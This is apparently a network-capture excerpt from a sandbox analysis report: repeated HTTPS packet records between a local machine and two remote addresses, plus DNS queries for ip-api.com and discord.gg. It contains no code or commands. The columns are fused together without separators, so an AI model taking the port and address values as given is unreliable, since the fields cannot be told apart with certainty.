                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.629414082 CET44349720142.250.181.100192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.630631924 CET44349720142.250.181.100192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.630645037 CET44349720142.250.181.100192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.630698919 CET49720443192.168.2.5142.250.181.100
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.638649940 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.638664961 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.638711929 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.638721943 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.638778925 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.645977020 CET49720443192.168.2.5142.250.181.100
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.646080017 CET44349720142.250.181.100192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.646223068 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.646236897 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.646286011 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.653842926 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.653856039 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.653908014 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.657969952 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.657984018 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.658032894 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.663479090 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.663523912 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.663527012 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.663535118 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.663577080 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.664021015 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.664077997 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.667495012 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.670387030 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.670454979 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.672272921 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.758913040 CET49720443192.168.2.5142.250.181.100
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.758964062 CET44349720142.250.181.100192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.790074110 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.790127039 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.790142059 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.792977095 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.793075085 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.886588097 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.909522057 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.909600019 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:14.960120916 CET49720443192.168.2.5142.250.181.100
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029243946 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029352903 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029403925 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029421091 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029424906 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029429913 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029438972 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029479980 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029479980 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029491901 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029500008 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029500961 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029531002 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029540062 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029545069 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029556990 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029572010 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029640913 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029686928 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029742956 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029787064 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029792070 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029851913 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029858112 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029874086 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029887915 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029894114 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029932022 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029937983 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029972076 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.029987097 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030016899 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030078888 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030123949 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030173063 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030220985 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030539989 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030546904 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030601025 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030822992 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030864954 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030873060 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030873060 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.030925989 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.031048059 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.031105042 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.031725883 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.031733036 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.031786919 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.031817913 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.031873941 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.031903028 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.031972885 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032099962 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032108068 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032140017 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032149076 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032201052 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032243013 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032294035 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032706976 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032713890 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032716036 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032768011 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032787085 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032792091 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032793999 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032797098 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032810926 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032814980 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032816887 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032866001 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032917976 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032928944 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032932043 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032932997 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032937050 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032943010 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032960892 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032970905 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032973051 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032980919 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.032983065 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033006907 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033014059 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033020973 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033025980 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033046007 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033061981 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033067942 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033081055 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033096075 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033143997 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033176899 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033196926 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033206940 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033216953 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033232927 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033246994 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033246994 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033262014 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033293009 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033540010 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033586025 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033592939 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033629894 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033700943 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033740997 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033768892 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033770084 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033781052 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033787966 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033823013 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033832073 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033864975 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033870935 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033878088 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033901930 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033906937 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033927917 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033940077 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033946037 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033972025 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.033983946 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034014940 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034034967 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034043074 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034049988 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034056902 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034059048 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034102917 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034105062 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034132957 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034138918 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.034147978 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.035182953 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.036712885 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.036751032 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.036789894 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.036798000 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.036837101 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.036989927 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.037039995 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.037045956 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.037096977 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.149138927 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.149578094 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.149646044 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.151243925 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.151259899 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.151309967 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.151674986 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.151734114 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.152376890 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.152395010 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.152435064 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.156399965 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.156409979 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.156454086 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.156725883 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.156810999 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.157660961 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.157716036 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.160429001 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.160439968 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.160506010 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.160758972 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.160825014 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.168066025 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.168076992 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.168127060 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.168299913 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.168374062 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.168442011 CET44349717162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.168493986 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.168494940 CET49717443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.168504000 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.168534040 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.170830965 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.170840979 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.170881033 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.171358109 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.171422005 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.172847986 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.172899008 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.177136898 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.177186012 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.180804968 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.180871964 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.180927992 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.180972099 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.185183048 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.185265064 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.185620070 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.185683012 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.187625885 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.187680960 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.191359997 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.191409111 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.195342064 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.195419073 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.201523066 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.201534986 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.201572895 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.201678038 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.201678038 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.201697111 CET44349718162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.201813936 CET49718443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.204884052 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.204973936 CET49719443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:15.214348078 CET44349719162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:05.255464077 CET192.168.2.51.1.1.10xc2b9Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:08.157646894 CET192.168.2.51.1.1.10x8af6Standard query (0)discord.ggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 23, 2024 21:12:08.157804966 CET192.168.2.51.1.1.10xc255Standard query (0)discord.gg65IN (0x0001)false
